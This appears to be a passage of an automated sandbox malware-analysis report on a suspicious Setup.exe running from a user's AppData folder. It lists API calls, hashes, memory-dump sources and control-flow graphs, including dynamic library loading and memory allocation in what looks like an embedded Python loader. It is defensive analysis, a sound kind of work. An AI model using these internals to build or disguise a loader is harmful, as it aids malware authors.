                                                                                                                                                                                                              • Part of subcall function 00401000: MessageBoxA.USER32(00000000), ref: 0040108C
                                                                                                                                                                                                            • strncmp.MSVCR90 ref: 004011D2
                                                                                                                                                                                                            • strrchr.MSVCR90 ref: 00401201
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ErrorFileFocusFormatFreeLastLocalModuleName_snprintflstrlenstrncmpstrncpystrrchr
                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Roaming\FeGIPCnK$C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe$Retrieving module name$\\?\
                                                                                                                                                                                                            • API String ID: 3478746248-3616565791
                                                                                                                                                                                                            • Opcode ID: 1c63dc24383a6b44afdcbb7e344813abb8cf198e7691c487b9f7923b4337fbf4
                                                                                                                                                                                                            • Instruction ID: 91c1268eff9de99491df4014b82af4a7232e339c9bbb35131923ff5da035fb76
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c63dc24383a6b44afdcbb7e344813abb8cf198e7691c487b9f7923b4337fbf4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E201ADB06406405BE3011BB95E1AB173A849B59B0AF1A8072FB46FF2E2DA7DC914865D

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Setup.jbxd
Similarity
• API ID: __iob_func$getenv
• String ID: <stdin>$<stdin>$PYTHONINSPECT$path
• API String ID: 952159037-346035110
• Opcode ID: 38fc9347ebd0b39b6a251194a392424c584476c304bd1f4b767da579e09a30c7
• Instruction ID: 3a0cd90c33e045019f3d85b4f9523035d4d057a98ccbf2b2234be1e6514390f9
• Opcode Fuzzy Hash: 38fc9347ebd0b39b6a251194a392424c584476c304bd1f4b767da579e09a30c7
• Instruction Fuzzy Hash: 2F018471A41710ABD61027B5AF0DB1F3A68DF41752F080036FD05F62A1EA39D924CEBE

Control-flow Graph
APIs
• FormatMessageA.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000), ref: 00401024
• strncpy.MSVCR90 ref: 00401038
• LocalFree.KERNEL32(?), ref: 00401046
• lstrlenA.KERNEL32(00000000), ref: 00401058
• _snprintf.MSVCR90 ref: 00401073
• GetFocus.USER32 ref: 00401085
• MessageBoxA.USER32(00000000), ref: 0040108C
Memory Dump Source
• Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Setup.jbxd
Similarity
• API ID: Message$FocusFormatFreeLocal_snprintflstrlenstrncpy
• String ID:
• API String ID: 2324749726-0
• Opcode ID: 5c360f393e6a0c1135d57203a577ae5badcfff9240942876dcb77ff3ee984539
• Instruction ID: d54df7ba943514a9ed245f917b7b029d9917e2ae8cd7c94c82d9e9a5e8dc25a3
• Opcode Fuzzy Hash: 5c360f393e6a0c1135d57203a577ae5badcfff9240942876dcb77ff3ee984539
• Instruction Fuzzy Hash: A20140F5514300BFE314ABA4DD4DF9B77A8ABC4704F00C828B789B61D1DA78D459C76A

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Setup.jbxd
Similarity
• API ID: __iob_func$getenv
• String ID: <stdin>$<stdin>$PYTHONINSPECT
• API String ID: 952159037-3944695568
• Opcode ID: 70635a653a20398afb8323c1779619fc8e2f8c30ff46a45be12a8d071d852709
• Instruction ID: 8cca01e1b034a1b8fc333b74f5ab705df7888345169281b2be04b1cf812c368c
• Opcode Fuzzy Hash: 70635a653a20398afb8323c1779619fc8e2f8c30ff46a45be12a8d071d852709
• Instruction Fuzzy Hash: 61E0C270E417119BDA0057F86F0DA1B3A2CDD05352B080077EC09F21E0DA78D864CEBE

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 222 4023a0-4023bd 223 4023c3-4023d3 IsBadReadPtr 222->223 224 402507-40250d 222->224 225 4023d9 223->225 226 4024ff-402506 223->226 227 4023e0-4023e5 225->227 228 4023eb-4023fb call 401ea0 227->228 229 40250e-402518 227->229 232 402401-40241e realloc 228->232 233 4024e7-4024ee 228->233 234 402424-402432 232->234 235 4024ef-4024fe SetLastError 232->235 236 402434-40243d 234->236 237 40243f-402444 234->237 238 402446-40244a 236->238 237->238 239 4024b6-4024c4 IsBadReadPtr 238->239 240 40244c 238->240 239->229 243 4024c6-4024ce 239->243 241 40247a-402489 240->241 242 40244e-40245b 240->242 244 40249b 241->244 245 40248b 241->245 246 40246b-40246c 242->246 247 40245d 242->247 243->227 249 40249c-40249d GetProcAddress 244->249 248 402490-402492 245->248 246->249 250 402460-402462 247->250 251 4024d3-4024dd call 402230 248->251 252 402494-402499 248->252 253 4024a3-4024a7 249->253 254 402464-402469 250->254 255 40246e-402478 call 402230 250->255 251->253 252->244 252->248 256 4024a9-4024b4 253->256 257 4024df-4024e1 SetLastError 253->257 254->246 254->250 255->253 256->239 256->240 257->233
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 004023CB
                                                                                                                                                                                                              • Part of subcall function 00401EA0: _stricmp.MSVCR90(004018FF,?,00000000,00000001,?,004023F3,004018FF,?,00402680,00000000), ref: 00401EBC
                                                                                                                                                                                                              • Part of subcall function 00401EA0: free.MSVCR90 ref: 00401EF0
                                                                                                                                                                                                            • realloc.MSVCR90 ref: 00402410
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000002), ref: 0040249D
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 004024BC
                                                                                                                                                                                                            • SetLastError.KERNEL32(0000007F), ref: 004024E1
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000008), ref: 004024F1
Memory Dump Source
• Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Setup.jbxd
Similarity
• API ID: ErrorLastRead$AddressProc_stricmpfreerealloc
• String ID:

Control-flow Graph
• Legend: Executed / Not Executed
• (graph rendered as an image; basic blocks 401d60-401ded; API calls named in the graph: OutputDebugStringA, __iob_func, fprintf; internal calls to 402520, 401cb0, 402230)
Strings
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID: undef symbol$undefined symbol %s -> exit(-1)

Control-flow Graph
• Legend: Executed / Not Executed
• (graph rendered as an image; basic blocks 401660-4016ef; API calls named in the graph: strncpy, GetFullPathNameA)
APIs
• strncpy.MSVCR90 ref: 004016BA
• GetFullPathNameA.KERNEL32(00406580,00000104,00406580,004019BA,6F8AF18A,?,004019BA), ref: 004016E7
Strings
Similarity
• API ID: FullNamePathstrncpy
• String ID: ^@$ ^@$C:\Users\user\AppData\Roaming\FeGIPCnK\common.bin

Control-flow Graph
• Legend: Executed / Not Executed
• (graph rendered as an image; basic blocks 4017d0-4018d3; API calls named in the graph: malloc, free; internal calls to 401000, 401c40)
APIs
Strings
Similarity
• API ID: freemalloc
• String ID: ,R@$no mem for late sys.path$path
APIs
• VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00000000,?,?,00402665,?,?,00000000), ref: 00401FB2
• memset.MSVCR90 ref: 00401FBB
• VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00000000,?,?,00402665,?,?,00000000), ref: 00401FD0
• memcpy.MSVCR90(00000000,e&@,00000000,?,00402665,?,?,00000000), ref: 00401FE0
Strings
Similarity
• API ID: AllocVirtual$memcpymemset
• String ID: e&@

Execution Graph

Execution Coverage: 2.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.5%
Total number of Nodes: 1712
Total number of Limit Nodes: 25
7ff764a2c986 20046->20047 20048 7ff764a2c971 20046->20048 20052 7ff764a2c98c 20048->20052 20053 7ff764a2c9d6 20052->20053 20054 7ff764a2c9ce 20052->20054 20056 7ff764a2b560 __free_lconv_mon 14 API calls 20053->20056 20055 7ff764a2b560 __free_lconv_mon 14 API calls 20054->20055 20055->20053 20057 7ff764a2c9e3 20056->20057 20058 7ff764a2b560 __free_lconv_mon 14 API calls 20057->20058 20059 7ff764a2c9f0 20058->20059 20060 7ff764a2b560 __free_lconv_mon 14 API calls 20059->20060 20061 7ff764a2c9fd 20060->20061 20062 7ff764a2b560 __free_lconv_mon 14 API calls 20061->20062 20063 7ff764a2ca0a 20062->20063 20064 7ff764a2b560 __free_lconv_mon 14 API calls 20063->20064 20065 7ff764a2ca17 20064->20065 20066 7ff764a2b560 __free_lconv_mon 14 API calls 20065->20066 20067 7ff764a2ca24 20066->20067 20068 7ff764a2b560 __free_lconv_mon 14 API calls 20067->20068 20069 7ff764a2ca31 20068->20069 20070 7ff764a2b560 __free_lconv_mon 14 API calls 20069->20070 20071 7ff764a2ca41 20070->20071 20072 7ff764a2b560 __free_lconv_mon 14 API calls 20071->20072 20073 7ff764a2ca51 20072->20073 20078 7ff764a2c83c 20073->20078 20092 7ff764a2f528 EnterCriticalSection 20078->20092 17321 7ff764a1f99c 17322 7ff764a1f9b9 GetModuleHandleW 17321->17322 17323 7ff764a1fa03 17321->17323 17322->17323 17329 7ff764a1f9c6 17322->17329 17331 7ff764a1f894 17323->17331 17326 7ff764a1fa45 17328 7ff764a1fa57 17329->17323 17345 7ff764a1faa4 GetModuleHandleExW 17329->17345 17351 7ff764a2f528 EnterCriticalSection 17331->17351 17333 7ff764a1f8b0 17334 7ff764a1f8cc 14 API calls 17333->17334 17335 7ff764a1f8b9 17334->17335 17336 7ff764a2f57c _isindst LeaveCriticalSection 17335->17336 17337 7ff764a1f8c1 17336->17337 17337->17326 17338 7ff764a1fa58 17337->17338 17352 7ff764a307e8 17338->17352 17341 7ff764a1fa92 17343 7ff764a1faa4 3 API calls 17341->17343 17342 7ff764a1fa81 GetCurrentProcess TerminateProcess 17342->17341 17344 7ff764a1fa99 ExitProcess 17343->17344 17346 7ff764a1faca GetProcAddress 17345->17346 17347 7ff764a1fae9 
17345->17347 17346->17347 17348 7ff764a1fae1 17346->17348 17349 7ff764a1faf9 17347->17349 17350 7ff764a1faf3 FreeLibrary 17347->17350 17348->17347 17349->17323 17350->17349 17353 7ff764a1fa65 17352->17353 17354 7ff764a30806 17352->17354 17353->17341 17353->17342 17356 7ff764a2b778 17354->17356 17359 7ff764a2b5a0 17356->17359 17360 7ff764a2b601 17359->17360 17366 7ff764a2b5fc try_get_function 17359->17366 17360->17353 17361 7ff764a2b6e4 17361->17360 17364 7ff764a2b6f2 GetProcAddress 17361->17364 17362 7ff764a2b630 LoadLibraryExW 17363 7ff764a2b651 GetLastError 17362->17363 17362->17366 17363->17366 17364->17360 17365 7ff764a2b6c9 FreeLibrary 17365->17366 17366->17360 17366->17361 17366->17362 17366->17365 17367 7ff764a2b68b LoadLibraryExW 17366->17367 17367->17366 19833 7ff764a1cbdc 19834 7ff764a1cbe7 19833->19834 19842 7ff764a2bcd8 19834->19842 19855 7ff764a2f528 EnterCriticalSection 19842->19855 17368 7ff764a1a7a4 17391 7ff764a1acbc 17368->17391 17371 7ff764a1a8f0 17428 7ff764a1afe4 IsProcessorFeaturePresent 17371->17428 17372 7ff764a1a7c0 __scrt_acquire_startup_lock 17374 7ff764a1a8fa 17372->17374 17382 7ff764a1a7de __scrt_release_startup_lock 17372->17382 17375 7ff764a1afe4 7 API calls 17374->17375 17377 7ff764a1a905 sscanf 17375->17377 17376 7ff764a1a803 17378 7ff764a1a889 17397 7ff764a1b130 17378->17397 17380 7ff764a1a88e 17400 7ff764a27fe4 17380->17400 17382->17376 17382->17378 17417 7ff764a1fb34 17382->17417 17388 7ff764a1a8b1 17388->17377 17424 7ff764a1ae50 17388->17424 17435 7ff764a1b2ac 17391->17435 17394 7ff764a1a7b8 17394->17371 17394->17372 17395 7ff764a1aceb __scrt_initialize_crt 17395->17394 17437 7ff764a1c394 17395->17437 17464 7ff764a1bb50 17397->17464 17399 7ff764a1b147 GetStartupInfoW 17399->17380 17466 7ff764a2e580 17400->17466 17402 7ff764a27ff3 17403 7ff764a1a896 17402->17403 17472 7ff764a325c8 17402->17472 17405 7ff764a11000 17403->17405 17406 7ff764a1100f 17405->17406 17407 7ff764a1106c GetCommandLineA 17406->17407 17921 7ff764a1115c 
17406->17921 17842 7ff764a11304 17407->17842 17410 7ff764a1107a 17849 7ff764a111b8 17410->17849 17412 7ff764a11036 17412->17407 17413 7ff764a1115c wprintf 60 API calls 17412->17413 17413->17412 17414 7ff764a11091 17854 7ff764a11da4 17414->17854 17416 7ff764a11144 17422 7ff764a1b174 GetModuleHandleW 17416->17422 17418 7ff764a1fb58 17417->17418 17419 7ff764a1fb6a 17417->17419 17418->17378 19674 7ff764a28910 17419->19674 17423 7ff764a1b185 17422->17423 17423->17388 17426 7ff764a1ae61 17424->17426 17425 7ff764a1a8c8 17425->17376 17426->17425 17427 7ff764a1c394 __scrt_initialize_crt 7 API calls 17426->17427 17427->17425 17429 7ff764a1b00a _isindst __scrt_get_show_window_mode 17428->17429 17430 7ff764a1b029 RtlCaptureContext RtlLookupFunctionEntry 17429->17430 17431 7ff764a1b08e __scrt_get_show_window_mode 17430->17431 17432 7ff764a1b052 RtlVirtualUnwind 17430->17432 17433 7ff764a1b0c0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17431->17433 17432->17431 17434 7ff764a1b112 _isindst 17433->17434 17434->17374 17436 7ff764a1acde __scrt_dllmain_crt_thread_attach 17435->17436 17436->17394 17436->17395 17438 7ff764a1c39c 17437->17438 17439 7ff764a1c3a6 17437->17439 17443 7ff764a1c610 17438->17443 17439->17394 17444 7ff764a1c3a1 17443->17444 17445 7ff764a1c61f 17443->17445 17447 7ff764a1c67c 17444->17447 17451 7ff764a1c84c 17445->17451 17448 7ff764a1c6a7 17447->17448 17449 7ff764a1c68a DeleteCriticalSection 17448->17449 17450 7ff764a1c6ab 17448->17450 17449->17448 17450->17439 17455 7ff764a1c6b4 17451->17455 17456 7ff764a1c6f8 try_get_function 17455->17456 17462 7ff764a1c7ce TlsFree 17455->17462 17457 7ff764a1c726 LoadLibraryExW 17456->17457 17458 7ff764a1c7bd GetProcAddress 17456->17458 17456->17462 17463 7ff764a1c769 LoadLibraryExW 17456->17463 17459 7ff764a1c747 GetLastError 17457->17459 17460 7ff764a1c79d 17457->17460 17458->17462 17459->17456 17460->17458 17461 7ff764a1c7b4 FreeLibrary 17460->17461 17461->17458 17463->17456 17463->17460 17465 
7ff764a1bb30 17464->17465 17465->17399 17465->17465 17467 7ff764a2e58d 17466->17467 17471 7ff764a2e5d2 17466->17471 17476 7ff764a2cbc0 17467->17476 17471->17402 17473 7ff764a32550 17472->17473 17474 7ff764a1d120 sscanf 26 API calls 17473->17474 17475 7ff764a32574 17474->17475 17475->17402 17477 7ff764a2cbd1 17476->17477 17481 7ff764a2cbd6 17476->17481 17519 7ff764a2b9c0 17477->17519 17482 7ff764a2cbde 17481->17482 17523 7ff764a2ba08 17481->17523 17489 7ff764a2cc58 17482->17489 17546 7ff764a2a544 17482->17546 17485 7ff764a2cc08 17487 7ff764a2cc26 17485->17487 17488 7ff764a2cc16 17485->17488 17491 7ff764a2ba08 _invalid_parameter_noinfo 6 API calls 17487->17491 17490 7ff764a2ba08 _invalid_parameter_noinfo 6 API calls 17488->17490 17501 7ff764a2e308 17489->17501 17492 7ff764a2cc1d 17490->17492 17493 7ff764a2cc2e 17491->17493 17535 7ff764a2b560 17492->17535 17494 7ff764a2cc32 17493->17494 17495 7ff764a2cc44 17493->17495 17496 7ff764a2ba08 _invalid_parameter_noinfo 6 API calls 17494->17496 17541 7ff764a2c89c 17495->17541 17496->17492 17687 7ff764a2e4c8 17501->17687 17503 7ff764a2e331 17702 7ff764a2e014 17503->17702 17506 7ff764a2e34b 17506->17471 17508 7ff764a2e3f7 17510 7ff764a2b560 __free_lconv_mon 14 API calls 17508->17510 17509 7ff764a2e35c 17509->17508 17716 7ff764a2e5fc 17509->17716 17510->17506 17512 7ff764a2e3eb 17513 7ff764a2e3f2 17512->17513 17516 7ff764a2e417 17512->17516 17514 7ff764a2681c _get_daylight 14 API calls 17513->17514 17514->17508 17515 7ff764a2e454 17515->17508 17725 7ff764a2de58 17515->17725 17516->17515 17517 7ff764a2b560 __free_lconv_mon 14 API calls 17516->17517 17517->17515 17520 7ff764a2b5a0 try_get_function 5 API calls 17519->17520 17521 7ff764a2b9e7 TlsGetValue 17520->17521 17524 7ff764a2b5a0 try_get_function 5 API calls 17523->17524 17525 7ff764a2ba36 17524->17525 17526 7ff764a2ba48 TlsSetValue 17525->17526 17527 7ff764a2ba40 17525->17527 17526->17527 17527->17482 17528 7ff764a2b4e8 17527->17528 17533 7ff764a2b4f9 
_invalid_parameter_noinfo 17528->17533 17529 7ff764a2b54a 17558 7ff764a2681c 17529->17558 17530 7ff764a2b52e HeapAlloc 17531 7ff764a2b548 17530->17531 17530->17533 17531->17485 17533->17529 17533->17530 17555 7ff764a33020 17533->17555 17536 7ff764a2b565 HeapFree 17535->17536 17537 7ff764a2b595 __free_lconv_mon 17535->17537 17536->17537 17538 7ff764a2b580 17536->17538 17537->17482 17539 7ff764a2681c _get_daylight 12 API calls 17538->17539 17540 7ff764a2b585 GetLastError 17539->17540 17540->17537 17590 7ff764a2c774 17541->17590 17604 7ff764a330cc 17546->17604 17561 7ff764a33050 17555->17561 17567 7ff764a2cc68 GetLastError 17558->17567 17560 7ff764a26825 17560->17531 17566 7ff764a2f528 EnterCriticalSection 17561->17566 17568 7ff764a2cc8f 17567->17568 17569 7ff764a2cc8a 17567->17569 17571 7ff764a2ba08 _invalid_parameter_noinfo 6 API calls 17568->17571 17574 7ff764a2cc97 SetLastError 17568->17574 17570 7ff764a2b9c0 _invalid_parameter_noinfo 6 API calls 17569->17570 17570->17568 17572 7ff764a2ccb2 17571->17572 17573 7ff764a2b4e8 _invalid_parameter_noinfo 12 API calls 17572->17573 17572->17574 17576 7ff764a2ccc5 17573->17576 17574->17560 17577 7ff764a2cce3 17576->17577 17578 7ff764a2ccd3 17576->17578 17580 7ff764a2ba08 _invalid_parameter_noinfo 6 API calls 17577->17580 17579 7ff764a2ba08 _invalid_parameter_noinfo 6 API calls 17578->17579 17581 7ff764a2ccda 17579->17581 17582 7ff764a2cceb 17580->17582 17586 7ff764a2b560 __free_lconv_mon 12 API calls 17581->17586 17583 7ff764a2cd01 17582->17583 17584 7ff764a2ccef 17582->17584 17585 7ff764a2c89c _invalid_parameter_noinfo 12 API calls 17583->17585 17587 7ff764a2ba08 _invalid_parameter_noinfo 6 API calls 17584->17587 17588 7ff764a2cd09 17585->17588 17586->17574 17587->17581 17589 7ff764a2b560 __free_lconv_mon 12 API calls 17588->17589 17589->17574 17602 7ff764a2f528 EnterCriticalSection 17590->17602 17636 7ff764a33084 17604->17636 17641 7ff764a2f528 EnterCriticalSection 17636->17641 17688 7ff764a2e4eb 17687->17688 17689 
7ff764a2e4f5 17688->17689 17740 7ff764a2f528 EnterCriticalSection 17688->17740 17691 7ff764a2e567 17689->17691 17694 7ff764a2a544 sscanf 26 API calls 17689->17694 17691->17503 17695 7ff764a2e57f 17694->17695 17697 7ff764a2e5d2 17695->17697 17699 7ff764a2cbc0 26 API calls 17695->17699 17697->17503 17700 7ff764a2e5bc 17699->17700 17701 7ff764a2e308 36 API calls 17700->17701 17701->17697 17741 7ff764a1d120 17702->17741 17705 7ff764a2e046 17707 7ff764a2e04b GetACP 17705->17707 17708 7ff764a2e05b 17705->17708 17706 7ff764a2e034 GetOEMCP 17706->17708 17707->17708 17708->17506 17709 7ff764a2c044 17708->17709 17710 7ff764a2c08f 17709->17710 17714 7ff764a2c053 _invalid_parameter_noinfo 17709->17714 17712 7ff764a2681c _get_daylight 14 API calls 17710->17712 17711 7ff764a2c076 HeapAlloc 17713 7ff764a2c08d 17711->17713 17711->17714 17712->17713 17713->17509 17714->17710 17714->17711 17715 7ff764a33020 _invalid_parameter_noinfo 2 API calls 17714->17715 17715->17714 17717 7ff764a2e014 28 API calls 17716->17717 17718 7ff764a2e627 17717->17718 17719 7ff764a2e664 IsValidCodePage 17718->17719 17722 7ff764a2e6a7 __scrt_get_show_window_mode _handle_error 17718->17722 17720 7ff764a2e675 17719->17720 17719->17722 17721 7ff764a2e6ac GetCPInfo 17720->17721 17723 7ff764a2e67e __scrt_get_show_window_mode 17720->17723 17721->17722 17721->17723 17722->17512 17773 7ff764a2e124 17723->17773 17841 7ff764a2f528 EnterCriticalSection 17725->17841 17742 7ff764a1d13f 17741->17742 17743 7ff764a1d144 17741->17743 17742->17705 17742->17706 17743->17742 17744 7ff764a2caec sscanf 26 API calls 17743->17744 17745 7ff764a1d15f 17744->17745 17749 7ff764a2cd94 17745->17749 17750 7ff764a2cda9 17749->17750 17752 7ff764a1d182 17749->17752 17750->17752 17757 7ff764a32dc4 17750->17757 17753 7ff764a2cdc8 17752->17753 17754 7ff764a2cddd 17753->17754 17756 7ff764a2cdf0 17753->17756 17754->17756 17770 7ff764a2e5e0 17754->17770 17756->17742 17758 7ff764a2caec sscanf 26 API calls 17757->17758 17759 7ff764a32dd3 
17758->17759 17760 7ff764a32e1e 17759->17760 17769 7ff764a2f528 EnterCriticalSection 17759->17769 17760->17752 17771 7ff764a2caec sscanf 26 API calls 17770->17771 17772 7ff764a2e5e9 17771->17772 17774 7ff764a2e161 GetCPInfo 17773->17774 17781 7ff764a2e257 _handle_error 17773->17781 17777 7ff764a2e174 17774->17777 17774->17781 17782 7ff764a32900 17777->17782 17781->17722 17783 7ff764a1d120 sscanf 26 API calls 17782->17783 17784 7ff764a32942 17783->17784 17800 7ff764a2dd4c 17784->17800 17801 7ff764a2dd54 MultiByteToWideChar 17800->17801 17925 7ff764a1127c 17842->17925 17845 7ff764a1132b 17847 7ff764a1127c 52 API calls 17845->17847 17848 7ff764a1137f 17845->17848 17931 7ff764a113b8 17845->17931 17935 7ff764a111ec 17845->17935 17847->17845 17848->17410 17850 7ff764a111c1 17849->17850 17851 7ff764a111c6 17850->17851 17852 7ff764a1f670 52 API calls 17850->17852 17851->17414 17853 7ff764a111d7 17852->17853 17973 7ff764a165ec 17854->17973 17856 7ff764a11e5e 17857 7ff764a1115c wprintf 60 API calls 17856->17857 17860 7ff764a11f59 17856->17860 17858 7ff764a11e77 17857->17858 17863 7ff764a1115c wprintf 60 API calls 17858->17863 17859 7ff764a11faa 17978 7ff764a138c8 17859->17978 17860->17859 17862 7ff764a1115c wprintf 60 API calls 17860->17862 17868 7ff764a11f6e 17862->17868 17865 7ff764a11e9f 17863->17865 17864 7ff764a11fbd 18018 7ff764a1593c 17864->18018 17869 7ff764a1115c wprintf 60 API calls 17865->17869 17867 7ff764a11f9c 18042 7ff764a117b4 17867->18042 17868->17867 17872 7ff764a1115c wprintf 60 API calls 17868->17872 17873 7ff764a11eb9 17869->17873 17871 7ff764a11ff8 17874 7ff764a1200f 17871->17874 18055 7ff764a13e6c 17871->18055 17872->17868 17875 7ff764a1115c wprintf 60 API calls 17873->17875 17879 7ff764a12027 17874->17879 17880 7ff764a12022 17874->17880 17877 7ff764a11ecc 17875->17877 17878 7ff764a1115c wprintf 60 API calls 17877->17878 17881 7ff764a11edf 17878->17881 18068 7ff764a16a04 17879->18068 18063 7ff764a15660 17880->18063 17884 7ff764a1115c wprintf 60 API 
calls 17881->17884 17885 7ff764a11ef9 17884->17885 17887 7ff764a1115c wprintf 60 API calls 17885->17887 17886 7ff764a1203f 17888 7ff764a12043 _handle_error 17886->17888 17890 7ff764a15660 2 API calls 17886->17890 17894 7ff764a1205b 17886->17894 17889 7ff764a11f0c 17887->17889 17888->17416 17891 7ff764a1115c wprintf 60 API calls 17889->17891 17890->17894 17892 7ff764a11f1f 17891->17892 17893 7ff764a1115c wprintf 60 API calls 17892->17893 17896 7ff764a11f2b 17893->17896 18077 7ff764a112a8 17894->18077 17901 7ff764a1115c wprintf 60 API calls 17896->17901 17898 7ff764a1208f 18081 7ff764a142a8 17898->18081 17899 7ff764a120c0 18115 7ff764a13de4 17899->18115 17901->17860 17905 7ff764a120b2 17905->17888 18123 7ff764a12be4 17905->18123 17908 7ff764a1223a 17910 7ff764a117b4 55 API calls 17908->17910 17911 7ff764a12248 17910->17911 18144 7ff764a169b8 17911->18144 17913 7ff764a12184 17913->17908 17914 7ff764a111b8 52 API calls 17913->17914 17918 7ff764a121e8 17914->17918 17915 7ff764a12138 17915->17913 17916 7ff764a111b8 52 API calls 17915->17916 17917 7ff764a12165 sprintf 17916->17917 17920 7ff764a117b4 55 API calls 17917->17920 17919 7ff764a117b4 55 API calls 17918->17919 17919->17908 17920->17913 17922 7ff764a11187 wprintf 17921->17922 17923 7ff764a1ed08 wprintf 60 API calls 17922->17923 17924 7ff764a111a5 17923->17924 17924->17412 17940 7ff764a28930 17925->17940 17927 7ff764a11285 17928 7ff764a1128a 17927->17928 17948 7ff764a1f670 17927->17948 17928->17845 17932 7ff764a113f0 CharNextExA 17931->17932 17933 7ff764a115b8 17932->17933 17934 7ff764a11410 17932->17934 17933->17845 17934->17932 17934->17933 17936 7ff764a111f5 17935->17936 17937 7ff764a111fa 17936->17937 17938 7ff764a1f670 52 API calls 17936->17938 17937->17845 17939 7ff764a1120b 17938->17939 17941 7ff764a28947 17940->17941 17944 7ff764a28978 17940->17944 17941->17944 17963 7ff764a2a4e4 17941->17963 17944->17927 17945 7ff764a2898f 17946 7ff764a2b4a0 _isindst 9 API calls 17945->17946 17947 7ff764a289a4 17946->17947 
17947->17927 17972 7ff764a2f748 EnterCriticalSection 17948->17972 17964 7ff764a2a4fb 17963->17964 17965 7ff764a2a4f1 17963->17965 17966 7ff764a2681c _get_daylight 14 API calls 17964->17966 17965->17964 17968 7ff764a2a516 17965->17968 17971 7ff764a2a502 17966->17971 17967 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 17969 7ff764a28974 17967->17969 17968->17969 17970 7ff764a2681c _get_daylight 14 API calls 17968->17970 17969->17944 17969->17945 17970->17971 17971->17967 17974 7ff764a1bb50 __scrt_get_show_window_mode 17973->17974 17975 7ff764a16604 InitCommonControlsEx 17974->17975 18147 7ff764a11218 17975->18147 17979 7ff764a1394a __scrt_get_show_window_mode 17978->17979 17980 7ff764a1397b 17979->17980 17981 7ff764a13963 17979->17981 17982 7ff764a111b8 52 API calls 17980->17982 17983 7ff764a1127c 52 API calls 17981->17983 17988 7ff764a13973 _handle_error 17981->17988 18003 7ff764a13988 17982->18003 17983->17988 17985 7ff764a13c62 17985->17988 18165 7ff764a17454 17985->18165 17986 7ff764a13d82 17989 7ff764a16630 61 API calls 17986->17989 17987 7ff764a1127c 52 API calls 17987->17985 17988->17864 17994 7ff764a13d9f 17989->17994 17991 7ff764a13b40 17991->17986 17995 7ff764a111b8 52 API calls 17991->17995 17998 7ff764a13ba8 17991->17998 18006 7ff764a13bff 17991->18006 17992 7ff764a13c80 17993 7ff764a13c88 17992->17993 